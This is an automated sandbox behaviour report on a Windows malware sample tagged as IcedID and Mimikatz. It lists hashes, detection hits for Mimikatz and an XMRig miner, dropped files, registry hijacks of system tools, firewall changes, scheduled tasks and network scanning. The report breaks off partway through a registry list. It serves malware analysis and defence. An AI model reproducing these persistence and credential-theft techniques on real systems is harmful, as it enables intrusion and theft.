Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
15/05/2024, 04:55
Behavioral task
behavioral1
Sample
2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe
Resource
win7-20240508-en
General
-
Target
2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe
-
Size
7.7MB
-
MD5
9f2ea90942513e7b78a48f27a200023e
-
SHA1
7465a6c99958b3773d07b5dd9beb0b43aa4b68b6
-
SHA256
fe7094533634c573302b1f766b7b640120b6fe3c4f4b3f446d597dd57a4600d6
-
SHA512
e14b5c2d923d61b3e0e1178945b287ad81b25c91797fa1383c9daabb2d20c863ef132de664653aea20a056d70ab11efd1dcf33447e8d879d339a12e2996a0ff3
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2736 created 920 2736 arblnql.exe 17 -
Contacts a large (26745) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral1/memory/2296-136-0x000000013FDF0000-0x000000013FEDE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral1/memory/2296-138-0x000000013FDF0000-0x000000013FEDE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 33 IoCs
resource yara_rule behavioral1/memory/2964-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral1/memory/2964-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral1/files/0x0036000000015c7f-5.dat UPX behavioral1/memory/1796-9-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral1/files/0x0005000000019491-130.dat UPX behavioral1/memory/1356-134-0x0000000000FA0000-0x000000000108E000-memory.dmp UPX behavioral1/memory/2296-136-0x000000013FDF0000-0x000000013FEDE000-memory.dmp UPX behavioral1/memory/2296-138-0x000000013FDF0000-0x000000013FEDE000-memory.dmp UPX behavioral1/files/0x00050000000195e3-140.dat UPX behavioral1/memory/584-144-0x000000013F6A0000-0x000000013F6FB000-memory.dmp UPX behavioral1/files/0x00050000000195a4-164.dat UPX behavioral1/memory/1004-168-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/584-171-0x000000013F6A0000-0x000000013F6FB000-memory.dmp UPX behavioral1/memory/2616-179-0x000000013F340000-0x000000013F39B000-memory.dmp UPX behavioral1/memory/2616-181-0x000000013F340000-0x000000013F39B000-memory.dmp UPX behavioral1/memory/1696-187-0x000000013F780000-0x000000013F7DB000-memory.dmp UPX behavioral1/memory/1696-189-0x000000013F780000-0x000000013F7DB000-memory.dmp UPX behavioral1/memory/1996-195-0x000000013F580000-0x000000013F5DB000-memory.dmp UPX behavioral1/memory/1996-197-0x000000013F580000-0x000000013F5DB000-memory.dmp UPX behavioral1/memory/1004-199-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/2512-204-0x000000013F820000-0x000000013F87B000-memory.dmp UPX behavioral1/memory/2512-206-0x000000013F820000-0x000000013F87B000-memory.dmp UPX behavioral1/memory/1004-214-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-215-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-217-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-220-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-221-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-237-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-238-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-243-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-295-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-301-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX behavioral1/memory/1004-303-0x000000013F2C0000-0x000000013F3E0000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1004-199-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-214-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-215-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-217-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-220-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-221-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-237-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-238-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-243-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-295-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-301-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig behavioral1/memory/1004-303-0x000000013F2C0000-0x000000013F3E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 9 IoCs
resource yara_rule behavioral1/memory/2964-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2964-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x0036000000015c7f-5.dat mimikatz behavioral1/memory/1796-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/1356-135-0x0000000000FA0000-0x000000000108E000-memory.dmp mimikatz behavioral1/memory/2296-136-0x000000013FDF0000-0x000000013FEDE000-memory.dmp mimikatz behavioral1/memory/2296-138-0x000000013FDF0000-0x000000013FEDE000-memory.dmp mimikatz behavioral1/memory/2736-166-0x0000000002A80000-0x0000000002BA0000-memory.dmp mimikatz behavioral1/memory/2736-213-0x0000000002A80000-0x0000000002BA0000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts arblnql.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts arblnql.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1064 netsh.exe 1860 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe arblnql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe arblnql.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe arblnql.exe -
Executes dropped EXE 16 IoCs
pid Process 1796 arblnql.exe 2736 arblnql.exe 3032 wpcap.exe 624 befughplr.exe 2296 vfshost.exe 584 teqnffvbl.exe 784 xohudmc.exe 2988 rifzsk.exe 1004 pbjnmw.exe 2616 teqnffvbl.exe 1696 teqnffvbl.exe 1996 teqnffvbl.exe 2512 teqnffvbl.exe 2708 arblnql.exe 2712 pywtbzgyt.exe 3760 arblnql.exe -
Loads dropped DLL 22 IoCs
pid Process 1592 cmd.exe 1592 cmd.exe 2880 cmd.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 684 cmd.exe 624 befughplr.exe 624 befughplr.exe 1356 cmd.exe 1356 cmd.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2736 arblnql.exe 2412 cmd.exe -
resource yara_rule behavioral1/files/0x0005000000019491-130.dat upx behavioral1/memory/2296-136-0x000000013FDF0000-0x000000013FEDE000-memory.dmp upx behavioral1/memory/2296-138-0x000000013FDF0000-0x000000013FEDE000-memory.dmp upx behavioral1/files/0x00050000000195e3-140.dat upx behavioral1/memory/584-144-0x000000013F6A0000-0x000000013F6FB000-memory.dmp upx behavioral1/files/0x00050000000195a4-164.dat upx behavioral1/memory/1004-168-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/584-171-0x000000013F6A0000-0x000000013F6FB000-memory.dmp upx behavioral1/memory/2616-179-0x000000013F340000-0x000000013F39B000-memory.dmp upx behavioral1/memory/2616-181-0x000000013F340000-0x000000013F39B000-memory.dmp upx behavioral1/memory/1696-187-0x000000013F780000-0x000000013F7DB000-memory.dmp upx behavioral1/memory/1696-189-0x000000013F780000-0x000000013F7DB000-memory.dmp upx behavioral1/memory/1996-195-0x000000013F580000-0x000000013F5DB000-memory.dmp upx behavioral1/memory/1996-197-0x000000013F580000-0x000000013F5DB000-memory.dmp upx behavioral1/memory/1004-199-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/2736-203-0x00000000019B0000-0x0000000001A0B000-memory.dmp upx behavioral1/memory/2512-204-0x000000013F820000-0x000000013F87B000-memory.dmp upx behavioral1/memory/2512-206-0x000000013F820000-0x000000013F87B000-memory.dmp upx behavioral1/memory/1004-214-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-215-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-217-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-220-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-221-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-237-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-238-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-243-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-295-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-301-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx behavioral1/memory/1004-303-0x000000013F2C0000-0x000000013F3E0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ifconfig.me 22 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 arblnql.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 arblnql.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 arblnql.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat arblnql.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\rifzsk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\rifzsk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 arblnql.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\yvpqryzbb\UnattendGC\specials\trfo-2.dll arblnql.exe File opened for modification C:\Windows\bezsyzlb\svschost.xml arblnql.exe File opened for modification C:\Windows\bezsyzlb\vimpcsvc.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\cnli-1.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\tibe-2.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\svschost.xml arblnql.exe File created C:\Windows\bezsyzlb\svschost.xml arblnql.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\befughplr.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\crli-0.dll arblnql.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\scan.bat arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\exma-1.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\vimpcsvc.exe arblnql.exe File created C:\Windows\bezsyzlb\schoedcl.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\schoedcl.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\docmicfg.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\spoolsrv.xml arblnql.exe File opened for modification C:\Windows\yvpqryzbb\Corporate\log.txt cmd.exe File created C:\Windows\yvpqryzbb\upbdrjv\swrpwe.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\ssleay32.dll arblnql.exe File created C:\Windows\yvpqryzbb\Corporate\mimidrv.sys arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\zlib1.dll arblnql.exe File created C:\Windows\yvpqryzbb\Corporate\vfshost.exe arblnql.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\wpcap.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\ucl.dll arblnql.exe File opened for modification C:\Windows\bezsyzlb\docmicfg.xml arblnql.exe File opened for modification C:\Windows\yvpqryzbb\qedqqjtfy\Result.txt pywtbzgyt.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\Packet.dll arblnql.exe File opened for modification C:\Windows\bezsyzlb\spoolsrv.xml arblnql.exe File created C:\Windows\yvpqryzbb\Corporate\mimilib.dll arblnql.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\ip.txt arblnql.exe File opened for modification C:\Windows\bezsyzlb\arblnql.exe 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\svschost.exe arblnql.exe File opened for modification C:\Windows\bezsyzlb\schoedcl.xml arblnql.exe File created C:\Windows\ime\arblnql.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\libeay32.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\docmicfg.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\coli-0.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\svschost.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\docmicfg.xml arblnql.exe File created C:\Windows\bezsyzlb\vimpcsvc.xml arblnql.exe File created C:\Windows\bezsyzlb\arblnql.exe 2024-05-15_9f2ea90942513e7b78a48f27a200023e_hacktools_icedid_mimikatz.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\pywtbzgyt.exe arblnql.exe File created C:\Windows\bezsyzlb\spoolsrv.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\AppCapture64.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\xdvl-0.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\schoedcl.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\AppCapture32.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\vimpcsvc.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\Shellcode.ini arblnql.exe File created C:\Windows\yvpqryzbb\qedqqjtfy\wpcap.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\libxml2.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\spoolsrv.exe arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\spoolsrv.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\schoedcl.xml arblnql.exe File opened for modification C:\Windows\yvpqryzbb\qedqqjtfy\Packet.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\trch-1.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\vimpcsvc.xml arblnql.exe File created C:\Windows\bezsyzlb\docmicfg.xml arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\posh-0.dll arblnql.exe File created C:\Windows\yvpqryzbb\UnattendGC\specials\tucl-1.dll arblnql.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1636 sc.exe 1728 sc.exe 2852 sc.exe 2280 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0036000000015c7f-5.dat nsis_installer_2 behavioral1/files/0x0008000000015d0c-16.dat nsis_installer_1 behavioral1/files/0x0008000000015d0c-16.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2476 schtasks.exe 1252 schtasks.exe 892 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates arblnql.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates arblnql.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teqnffvbl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0092000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 arblnql.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7EC843E0-8A68-4C69-BBC9-487FD2A1F10F}\WpadDecision = "0" arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump teqnffvbl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates arblnql.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" arblnql.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7EC843E0-8A68-4C69-BBC9-487FD2A1F10F} arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed arblnql.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0092000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 arblnql.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs arblnql.exe Key created 